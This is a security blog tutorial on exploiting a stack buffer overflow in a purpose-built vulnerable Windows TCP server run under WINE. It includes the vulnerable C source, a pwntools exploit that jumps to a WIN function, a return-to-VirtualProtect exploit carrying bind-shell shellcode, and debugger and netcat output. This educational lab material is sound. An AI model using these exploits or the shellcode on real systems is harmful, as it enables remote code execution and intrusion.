<!DOCTYPE html>
<html lang="en-us">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    
    <title>Pointers to the void  | Attacking applications running under WINE (Part II)</title>
    <meta name="HandheldFriendly" content="True">
    <meta name="MobileOptimized" content="320">

    <meta name="viewport" content="width=device-width,minimum-scale=1">
    <meta name="generator" content="Hugo 0.47.1" />
    
    
      <META NAME="ROBOTS" CONTENT="INDEX, FOLLOW">
    

    
    
      <link href="https://schlafwandler.github.io/dist/css/app.d98f2eb6bcd1eaedb7edf166bd16af26.css" rel="stylesheet">
    

    

    
      
    

    <meta content="WINE, security, exploitation, exploit, security, IT security, ASLR, DEP, shellcode, return-to-libc, ROP, VirtualProtect" name="keywords">
    <meta content=" - A simple exploit agaist a target in WINE" property="og:description">

    

    <meta property="og:title" content="Attacking applications running under WINE (Part II)" />
<meta property="og:description" content="A simple exploit agaist a target in WINE" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://schlafwandler.github.io/posts/attacking-wine-part-ii/" /><meta property="article:published_time" content="2019-05-20T15:56:30&#43;02:00"/>
<meta property="article:modified_time" content="2019-05-20T15:56:30&#43;02:00"/>

<meta itemprop="name" content="Attacking applications running under WINE (Part II)">
<meta itemprop="description" content="A simple exploit agaist a target in WINE">


<meta itemprop="datePublished" content="2019-05-20T15:56:30&#43;02:00" />
<meta itemprop="dateModified" content="2019-05-20T15:56:30&#43;02:00" />
<meta itemprop="wordCount" content="2542">



<meta itemprop="keywords" content="WINE," />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Attacking applications running under WINE (Part II)"/>
<meta name="twitter:description" content="A simple exploit agaist a target in WINE"/>

      
    
  </head>

  <body class="ma0 avenir bg-near-white">

    
   
  

  <header>
    <div class="bg-navy">
      <nav class="pv3 ph3 ph4-ns" role="navigation">
  <div class="flex-l justify-between items-center center">
    <a href="https://schlafwandler.github.io" class="f3 fw2 hover-white no-underline white-90 dib">
      Pointers to the void
    </a>
    <div class="flex-l items-center">
      

      
        <ul class="pl0 mr3">
          
          <li class="list f5 f4-ns fw4 dib pr3">
            <a class="hover-white no-underline white-90" href="https://schlafwandler.github.io/tags/" title=" page">
              
            </a>
          </li>
          
        </ul>
      
      











    </div>
  </div>
</nav>

    </div>
  </header>



    <main class="pb7" role="main">
      
  
  <article class="flex-l flex-wrap justify-between mw8 center ph3">

    <header class="mt4 w-100">
      <p class="f6 b helvetica tracked">
          
        POSTS
      </p>
      <h1 class="f1 athelas mb1">Attacking applications running under WINE (Part II)</h1>
      
      <time class="f6 mv4 dib tracked" datetime="2019-05-20T15:56:30&#43;02:00">May 20, 2019</time>      
      
      
    </header>

    <section class="nested-copy-line-height lh-copy serif f4 nested-links nested-img mid-gray pr4-l w-two-thirds-l">

<h2 id="simple-exploits-against-targets-under-wine">Simple exploits against targets under WINE</h2>

<p>In this part of the <a href="https://schlafwandler.github.io/series/attacking-wine/">series</a>, I will demonstrate some simple exploits against Windows executables running under WINE.
I will assume basic knowledge on exploiting stack overflows on the x86 architecture.
Additionally, some knowledge of return-oriented-programming (ROP) or return-to-libc exploitation techniques is beneficial.
Out of convenience I&rsquo;m using <a href="https://github.com/Gallopsled/pwntools">pwntools</a> for the development of the exploits, but every other toolkit will work as well.
Also, I&rsquo;m showing some rather simple task in some detail to demonstrate the use of Linux tools against windows binaries.</p>

<p>None of the techniques in this text are spectacularly new;
in fact, most are publicly known for over a decade.
The purpose of this part is to demonstrate how theses tricks can be applied against application in WINE.</p>

<p>If you are already familiar with basic stack-based buffer overflows under Windows, your TL;RD of this text is:
attacking a WINE applications feels a lot like attacking a target running on a Windows XP SP2:
with DEP, but without effective ASLR.
Many old buffer overflow tricks work as expected, and you can use Linux tools for the exploit development.
Also, Linux shellcodes can be used (which are normally a lot smaller than comparable Windows payloads).</p>

<h3 id="software-versions-used">Software versions used</h3>

<ul>
<li>wine-3.0.3 (Ubuntu 3.0.3-2)</li>
<li>Visual studio 2012</li>
<li>GDB (8.2)/gef</li>
</ul>

<p>All tests were done on a Ubuntu 18.10 x86_64.</p>

<h2 id="the-target">The target</h2>

<p>For this demonstration I wrote a simple TCP server program with an easy to abuse stack based buffer overflow.</p>

<p>The <a href="https://github.com/schlafwandler/attacking_wine/blob/master/Part_II/simple_server_target/simple_server_target/simple_server_target.cpp">code</a>:</p>

<pre><code class="language-C">#include &quot;stdafx.h&quot;

void WIN(void);

void handle_connection(int s)
{
	char buffer2[128];						[1]

	send(s,&quot;What's your name?\r\n&quot;,sizeof(&quot;What's your name?\r\n&quot;),0);
	int l = recv(s,buffer2,512,0);					[2]
	printf(&quot;recv %d\n&quot;,l);

	send(s,buffer2,strlen(buffer2),0);

	closesocket(s);
}

int _tmain(int argc, _TCHAR* argv[])
{
	WSADATA wsaData;
	int iResult;

	if (argc &gt; 1)
	{
		printf(&quot;WIN at %p\n&quot;,WIN);
		printf(&quot;Stack at %p\n&quot;,&amp;iResult);
	}

	// Initialize Winsock
	iResult = WSAStartup(MAKEWORD(2,2), &amp;wsaData);
	if (iResult != 0) {
		printf(&quot;WSAStartup failed: %d\n&quot;, iResult);
		return 1;
	}

	int s = socket(AF_INET,SOCK_STREAM,0);				[3]

	struct sockaddr_in sa;
	sa.sin_addr.S_un.S_addr	= INADDR_ANY;
	sa.sin_family = AF_INET;
	sa.sin_port = htons(31337);

	bind(s,(struct sockaddr*)&amp;sa,sizeof(struct sockaddr_in));
	listen(s,3);

	while(1)
	{
		struct sockaddr_in ca;
		int addrlen = sizeof(struct sockaddr_in);
		int c = accept(s,(struct sockaddr*)&amp;ca,&amp;addrlen);

		handle_connection(c);					[4]
	}
	return 0;
}

void WIN(void)								[5]
{
	printf(&quot;#########################\r\n&quot;);
	printf(&quot;###   You have won!   ###\r\n&quot;);
	printf(&quot;#########################\r\n&quot;);

	ExitProcess(1);
}
</code></pre>

<p>A TCP socket listening on port 31337 is created in the program&rsquo;s main function, beginning at [3].
Every incoming connection is handled by the handle_connection function.
Here, the buffer overflow happens:
At [2], up to 512 bytes are received into the buffer declared at [1].
But this buffer is just 128 bytes long.
So, if more than 128 bytes are send to the server, the additional bytes are written past the prepared buffer, overwriting the saved frame pointer, return address and whatever else is in the way.</p>

<p>The program also contains a function named WIN which is not called from anywhere in the code.
This will be our first target, before we proceed to arbitrary code execution.</p>

<p>To keep exploitation simple, we compile the code to 32 bit without stack protection (/GS-).</p>

<p>You can find the Visual Studio <a href="https://github.com/schlafwandler/attacking_wine/blob/master/Part_II/simple_server_target/">project</a> and compiled binary <a href="https://github.com/schlafwandler/attacking_wine/blob/master/Part_II/simple_server_target/Release/simple_server_target.exe">here</a>.
It can be run via <code>wine simple_server_target.exe</code></p>

<h2 id="calling-the-win-function">Calling the WIN-function</h2>

<p>The first goal is to reach the WIN function already present in the binary.
We will achieve this by simply overwriting the saved return address (like its <a href="http://phrack.org/issues/49/14.html">1996</a>).</p>

<p>At first, run the program in wine (<code>wine simple_server_target.exe</code>), attach gdb (<code>gdb -p $(pidof simple_server_target.exe)</code>) and let it continue.
Under Ubuntu, you might have to disable the ptrace_scope first (<code>echo 0 &gt; /proc/sys/kernel/yama/ptrace_scope</code> as root).</p>

<p>Next, send a <a href="http://docs.pwntools.com/en/stable/util/cyclic.html">cyclic pattern</a> to overflow the buffer and overwrite EIP.
This is a quick and reliable method to find out exactly which of the bytes we send to the target end up overwriting the saved instruction pointer.</p>

<pre><code class="language-python">from pwn import *
  
exploitstr = cyclic(512)

c = connect(&quot;127.0.0.1&quot;,31337)
c.send(exploitstr)
</code></pre>

<p>As expected, the target crashes upon receiving the overlong input:</p>

<pre><code>Program received signal SIGSEGV, Segmentation fault.
0x6261616e in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────────────────────────── registers ────
$eax   : 0xffffffff
$ebx   : 0x0       
$ecx   : 0x0033fc1c  →  &quot;oaabaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaala[...]&quot;
$edx   : 0x0       
$esp   : 0x0033fcbc  →  &quot;oaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacba[...]&quot;
$ebp   : 0x6261616d (&quot;maab&quot;?)
$esi   : 0x1       
$edi   : 0x0       
$eip   : 0x6261616e (&quot;naab&quot;?)
$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x006b $gs: 0x0063 
──────────────────────────────────────────────────────────────── stack ────
0x0033fcbc│+0x0000: &quot;oaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacba[...]&quot;	 ← $esp
0x0033fcc0│+0x0004: &quot;paabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaacca[...]&quot;
0x0033fcc4│+0x0008: &quot;qaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacda[...]&quot;
0x0033fcc8│+0x000c: &quot;raabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaacea[...]&quot;
0x0033fccc│+0x0010: &quot;saabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfa[...]&quot;
0x0033fcd0│+0x0014: &quot;taabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacga[...]&quot;
0x0033fcd4│+0x0018: &quot;uaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaacha[...]&quot;
0x0033fcd8│+0x001c: &quot;vaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaacia[...]&quot;
────────────────────────────────────────────────────────── code:x86:32 ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x6261616e
──────────────────────────────────────────────────────────────── trace ────
───────────────────────────────────────────────────────────────────────────
gef➤  
</code></pre>

<p>It&rsquo;s easy to see the saved EIP got overwritten with 0x6261616e, and the program segfaults when returning because there is no code at this address.</p>

<p>So, on which position in the constructed exploitstr are these bytes?</p>

<pre><code>In [1]: from pwn import *

In [2]: cyclic_find(0x6261616e)
Out[2]: 152
</code></pre>

<p>The values that end up overwriting the EIP are 152 bytes into the buffer.</p>

<p>From here, building the WIN-exploit is quite straightforward: we need to send 152 bytes of data (it will be ignored and serves just as filler), followed by the address of WIN (in the correct byte order).</p>

<p>The address of WIN itself can be easily found using any advanced disassembler like IDA or ghidra, either by following the references to the &ldquo;you have won&rdquo; string or just by looking at the function immediately following main.
In the provided binary it&rsquo;s 0x00401190 (as pointed out in <a href="https://schlafwandler.github.io/posts/attacking-wine-part-i/">Part I</a>, there is no address space layout randomisation, so this address does not change between runs).</p>

<p>So, the <a href="https://github.com/schlafwandler/attacking_wine/blob/master/Part_II/text_2_exploit_WIN.py">final exploit</a> is:</p>

<pre><code class="language-python">from pwn import *
  
WIN_ptr = 0x00401190

exploitstr = &quot;A&quot;*152 + p32(WIN_ptr)

c = connect(&quot;127.0.0.1&quot;,31337)
c.send(exploitstr)
</code></pre>

<p>To which the target responds with:</p>

<pre><code>$ wine simple_server_target.exe 2&gt;/dev/null
recv 156
#########################
###   You have won!   ###
#########################
</code></pre>

<p>Against a <a href="https://github.com/schlafwandler/attacking_wine/blob/master/Part_II/simple_server_target/x64/Release/simple_server_target.exe">64 bit target</a> the <a href="https://github.com/schlafwandler/attacking_wine/blob/master/Part_II/text_2_exploit_WIN_64.py">exploit</a> looks little different;
just the location of the saved RIP is different and the WIN function has a different address.</p>

<h2 id="arbitrary-code-execution">Arbitrary code execution</h2>

<p>So far, we have just executed code that was already part of the target binary.
As the next step, we will ignore the WIN function and get our own shellcode executed.</p>

<p>The &lsquo;old school&rsquo; way to do this is to place the shellcode (plus some NOPs) on the stack as part of the data overflowing the buffer and overwrite the saved EIP with the buffer&rsquo;s address.
Once handle_connection finishes, it returns to the buffer on the stack and the shellcode gets executed.</p>

<p>Finding the address of the buffer is easy:
Place a breakpoint on the ret of handle_connection (0x0040109A) and send the program some data (for example the exploit from the last section).</p>

<pre><code>Breakpoint 1, 0x0040109a in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────────────────────────── registers ────
$eax   : 0x0       
$ebx   : 0x0       
$ecx   : 0x0033fc1c  →  0x00000028 (&quot;(&quot;?)
$edx   : 0x0       
$esp   : 0x0033fcb8  →  0x00401190  →  0x68ec8b55
$ebp   : 0x41414141 (&quot;AAAA&quot;?)
$esi   : 0x1       
$edi   : 0x0       
$eip   : 0x0040109a  →  0xccccccc3  →  0x00000000
$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x006b $gs: 0x0063 

[...]
</code></pre>

<p>When the breakpoint gets hit, look at the current value of ESP (0x0033fcb8); that&rsquo;s were the saved instruction pointer resides.
As detailed in the last section, the buffer starts 152 bytes below the saved EIP, so it&rsquo;s located at 0x33fc20.
And again: there is no ASLR, so all these addresses are constant (for a given binary).</p>

<p>But there is an other problem: the stack is not executable.</p>

<pre><code>gef➤  vmmap 
Start      End        Offset     Perm Path
[...]
0x00242000 0x00340000 0x00000000 rw- 
[...]
</code></pre>

<p>As long as this is the case, we still can return to our shellcode, but all we get is an exception (for trying to execute code in not executable memory).
A somewhat classical way to get around this is to call <a href="https://docs.microsoft.com/en-us/windows/desktop/api/memoryapi/nf-memoryapi-virtualprotect">VirtualProtect</a> to make the stack executable before executing the shellcode.
Calling VirtualProtect before the stack is executable can be achieved using return oriented programming (ROP).
Here we will use a simple predecessor (or subset) of ROP often referred to as return-to-libc (or here: return-to-kernel32.dll.so).</p>

<p>I will not dive deep into the general concepts of this technique as there are
<a href="https://seclists.org/bugtraq/1997/Aug/63">many</a>
<a href="http://phrack.org/issues/58/4.html">good</a>
<a href="https://css.csail.mit.edu/6.858/2010/readings/return-to-libc.pdf">texts</a>
<a href="https://www.exploit-db.com/docs/english/28553-linux-classic-return-to-libc-&amp;-return-to-libc-chaining-tutorial.pdf">available</a>.</p>

<p>But in short: In Win32, all parameters are passed via the stack - which we control.
If we overwrite the the return address with the address of VirtualProtect, followed by the parameters we want to pass to the function,
at the end of handle_connection the target will &lsquo;return&rsquo; to the start of VirtualProtect.
And, conveniently, all the parameters VirtualProtect reads from the stack will be controlled by us.
We can therefore instruct the function to make the memory where our shellcode resides executable.
Additionally, we control what VirtualProtect considers its return address.
If we set this value to the address of our shellcode, VirtualProtect will &lsquo;return&rsquo; to the (now executable) shellcode - and we have won.</p>

<p>A side note:
I assume here that the exact address of VirtualProtect is known to the attacker.
This is <a href="https://schlafwandler.github.io/posts/attacking-wine-part-i/#wine-libraries-on-disk">trivial</a> if the library as used by the target is on hand:</p>

<pre><code>$ readelf -s kernel32.dll.so|grep GetProcAddress
   370: 7b480940   184 FUNC    GLOBAL DEFAULT   12 VirtualProtectEx
   532: 7b480a00    61 FUNC    GLOBAL DEFAULT   12 VirtualProtect
</code></pre>

<p>If the exact library version is unknown, this will be a much harder problem.
But as I concentrate on CTF style settings in these texts, I will assume that a the kernel32.dll.so file used on the target system is known and available.</p>

<p>To implement the attack as described, we must assemble the stack from the following building blocks (all 32bit/uint32_t values from the stack pointer in ascending order):</p>

<ul>
<li>Address of VirtualProtect</li>
</ul>

<p>The original return address is overwritten with the address of <a href="https://docs.microsoft.com/en-us/windows/desktop/api/memoryapi/nf-memoryapi-virtualprotect">VirtualProtect</a>.
When handle_connection returns, it pops this address from the stack and jumps there - right at the beginning of VirtualProtect.
As pointed out <a href="https://schlafwandler.github.io/posts/attacking-wine-part-i/#wine-libraries-on-disk">before</a>, you can get the address of VirtualProtect from kernel32.dll.so.</p>

<ul>
<li>Address of shellcode</li>
</ul>

<p>VirtualProtect expects to be called &lsquo;the normal way&rsquo;, via a call-instruction, which pushes the return address onto the stack.
This does not happen here because we jump to it via a ret, not a call.
But we can place the address of the shellcode here - at the position were under normal conditions the return address would have been.
Once VirtualProtect is done, it will pop this address of the stack and return to it, therefore executing the shellcode.</p>

<ul>
<li>lpAddress: Memory page of the shellcode</li>
</ul>

<p>In a normal call (in 32bit Windows), the function parameters are pushed to the stack directly before the call instruction.
So this value will be seen by VirtualProtect as it&rsquo;s first parameter, lpAddress.
This is is the address of the memory page whose permissions will be changed
(it must be the start address of a memory page, otherwise the call will fail).
We will use the start address of the memory page the buffer (and therefore, the shellcode) is located in.
And as there is no memory space layout randomisation, we can simply look that address up in gdb.</p>

<ul>
<li>dwSize: size of the region to change</li>
</ul>

<p>The second parameter for VirtualProtect is the size of the region to change.
We will use 4096, as out shellcode should fit in one page.</p>

<ul>
<li>flNewProtect: PAGE_EXECUTE_READWRITE</li>
</ul>

<p>Third parameter for VirtualProtect.
A constant describing the new protection mode (see <a href="https://docs.microsoft.com/de-de/windows/desktop/Memory/memory-protection-constants">here</a> for details).
Best for us is 0x40 (PAGE_EXECUTE_READWRITE)</p>

<ul>
<li>lpflOldProtect: address 4 bytes below shellcode</li>
</ul>

<p>The last parameter to VirtualProtect is a memory address that receives the old protection mode.
We are not really interested in that, but since it&rsquo;s not optional, we have to supply some writable address.
The beginning of the buffer is as good as any other place we know we have write permission.</p>

<p>Since VirtualProtect will create it&rsquo;s own local variables on the stack, the area below the saved EIP is a bad place to store the shellcode:
it would probably get overwritten by VirtualProtect&rsquo;s new local variables.
Luckily, we can write 512 bytes with the overflowing recv call; with the return address 152 bytes into the buffer and the 24 bytes needed for the new return addresses + parameters for VirtualProtect, this still leaves us with more than enough space behind the parameters to hold a shellcode and some NOPs.</p>

<p>As shellcode I use the <a href="http://shell-storm.org/shellcode/files/shellcode-836.php">Tiny Shell Bind TCP Shellcode</a> by Geyslan G. Bem,
a very small (73 bytes) Linux shellcode that binds a shell to TCP port 11111.
We could have used a Windows shellcode instead, but there is no real reason to do so:
Linux shellcodes are of simpler design, much smaller and work fine in a WINE environment.</p>

<p>So the final buffer we send to the target looks like this:</p>

<pre><code>[A*152][address of VirtualProtect][address of shellcode][lpAddress][dwSize][flNewProtect][lpflOldProtect][some NOPs][shellcode]
</code></pre>

<p>And that&rsquo;s it.
Once the ret of handle_connection is executed, it &lsquo;returns&rsquo; to the saved return address from the stack - which got overwritten with the
address of VirtualProtect.
For VirtualProtect there is not difference to it being normally invoked by a call instruction:
It takes the four parameters from the stack and does its work, setting the buffer&rsquo;s memory page to executable.
Upon return, VirtualProtect will take from the stack what it considers the return address pushed at it&rsquo;s own invocation - which is the shellcode&rsquo;s address placed by us.
So execution returns to the (now executable) shellcode - and we have won.</p>

<p>The <a href="https://github.com/schlafwandler/attacking_wine/blob/master/Part_II/text_2_exploit_shellcode.py">code</a>:</p>

<pre><code class="language-python">from pwn import *

# 836   Linux/x86   Tiny Shell Bind TCP - 73 bytes
# Written in 2013 by Geyslan G. Bem, Hacking bits
# http://shell-storm.org/shellcode/files/shellcode-836.php
# Opens tcp shell at port 11111
shellcode = &quot;&quot;
shellcode += &quot;\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a&quot;
shellcode += &quot;\x02\x89\xe1\xcd\x80\x5b\x5e\x52\x66\x68&quot;
shellcode += &quot;\x2b\x67\x6a\x10\x51\x50\xb0\x66\x89\xe1&quot;
shellcode += &quot;\xcd\x80\x89\x51\x04\xb0\x66\xb3\x04\xcd&quot;
shellcode += &quot;\x80\xb0\x66\x43\xcd\x80\x59\x93\x6a\x3f&quot;
shellcode += &quot;\x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f&quot;
shellcode += &quot;\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3&quot;
shellcode += &quot;\x41\xcd\x80&quot;

# might need some adjustment depending on your system
shellcode_ptr = 0x33fcd0

# Address via readelf -s /usr/lib/i386-linux-gnu/wine/kernel32.dll.so |grep VirtualProtect
# Update it if your kernel32.dll.so is different from
VirtualProtect_ptr = 0x7b480a00     		

# parameters to VirtualProtect
lpAddress       = shellcode_ptr &amp; 0xfffff000    # expexted address of shell
dwSize          = 4096                          # should cover our shellcod
flNewProtect    = 0x40                          # PAGE_EXECUTE_READWRITE
lpflOldProtect  = shellcode_ptr-100             # some writable address

exploitstr = &quot;A&quot;*152

# offset in exploitstr 152
# ROP-call to VirtualProtect
exploitstr += p32(VirtualProtect_ptr)

exploitstr += p32(shellcode_ptr)     # return to shellcode
# params to VirtualProtect
exploitstr += p32(lpAddress)
exploitstr += p32(dwSize)
exploitstr += p32(flNewProtect)
exploitstr += p32(lpflOldProtect)

exploitstr += &quot;\x90&quot;*4+shellcode

c = connect(&quot;127.0.0.1&quot;,31337)
c.send(exploitstr)
</code></pre>

<h3 id="testing-the-exploit">Testing the exploit</h3>

<p>Run <code>wine simple_server_target.exe</code> in one terminal, and test the exploit in an other:</p>

<pre><code>$ python text_2_exploit_shellcode.py 
[+] Opening connection to 127.0.0.1 on port 31337: Done
[*] Closed connection to 127.0.0.1 port 31337
$ nc -v 127.0.0.1 11111
Connection to 127.0.0.1 11111 port [tcp/*] succeeded!
uname -a
Linux testsystem 4.18.0-18-generic #19-Ubuntu SMP Tue Apr 2 18:13:16 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
^C

</code></pre>

<h2 id="were-do-we-go-from-here">Were do we go from here</h2>

<p>So far, there was nothing here beyond standard Windows exploitation (from the good old days of WIN XP SP2).
But in the next part of this series I will demonstrate a new, WINE specific trick:</p>

<p>There is a much more elegant way to make the stack (and many other things) executable than the return-to-VirtualProtect used here:
The VIRTUAL_SetForceExec ROP gadget.</p>
<ul class="pa0">
  
   <li class="list">
     <a href="https://schlafwandler.github.io/tags/wine" class="link f5 grow no-underline br-pill ba ph3 pv2 mb2 dib black sans-serif">WINE</a>
   </li>
  
</ul>
<div class="mt6">
        
      </div>
    </section>

    <aside class="w-30-l mt6-l"><div class="bg-light-gray pa3 nested-list-reset nested-copy-line-height nested-links">
    <p class="f5 b mb3">What&#39;s in this posts</p>
      <nav id="TableOfContents">
<ul>
<li>
<ul>
<li><a href="#simple-exploits-against-targets-under-wine">Simple exploits against targets under WINE</a>
<ul>
<li><a href="#software-versions-used">Software versions used</a></li>
</ul></li>
<li><a href="#the-target">The target</a></li>
<li><a href="#calling-the-win-function">Calling the WIN-function</a></li>
<li><a href="#arbitrary-code-execution">Arbitrary code execution</a>
<ul>
<li><a href="#testing-the-exploit">Testing the exploit</a></li>
</ul></li>
<li><a href="#were-do-we-go-from-here">Were do we go from here</a></li>
</ul></li>
</ul>
</nav>
  </div>




  <div class="bg-light-gray pa3 nested-list-reset nested-copy-line-height nested-links">
    <p class="f5 b mb3">Related</p>
    <ul class="pa0 list">
	   
	     <li  class="mb2">
          <a href="https://schlafwandler.github.io/posts/attacking-wine-part-i/">Attacking applications running under WINE (Part I)</a>
        </li>
	    
    </ul>
</div>

</aside>

  </article>

    </main>
    <footer class="bg-navy bottom-0 w-100 pa3" role="contentinfo">
  <div class="flex justify-between">
  <a class="f4 fw4 hover-white no-underline white-70 dn dib-ns pv2 ph3" href="https://schlafwandler.github.io" >
    &copy; 2019 Pointers to the void
  </a>
    <div>










</div>
  </div>
</footer>

    

  <script src="https://schlafwandler.github.io/dist/js/app.3fc0f988d21662902933.js"></script>


  </body>
</html>
